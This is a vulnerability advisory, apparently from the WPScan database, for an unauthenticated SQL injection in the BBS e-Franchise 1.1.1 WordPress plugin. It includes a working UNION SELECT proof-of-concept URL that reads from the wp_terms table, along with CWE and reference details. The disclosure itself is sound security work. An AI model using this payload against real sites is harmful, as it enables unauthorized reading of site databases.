BBS e-Franchise 1.1.1 - Unauthenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
$_GET[‘uid’] is not escaped, the URL is accessible for any user.

You will have find a post or page that uses the plugin's shortcode.
Proof of Concept
http://www.example.com/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1

Affects Plugin

References

EXPLOITDB 40782
URL http://lenonleite.com.br/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Views 144
Verified No
WPVDB ID 8685

Timeline

Publicly Published 2016-11-12 (10 months ago)
Added 2016-12-06 (10 months ago)
Last Updated 2016-12-06 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.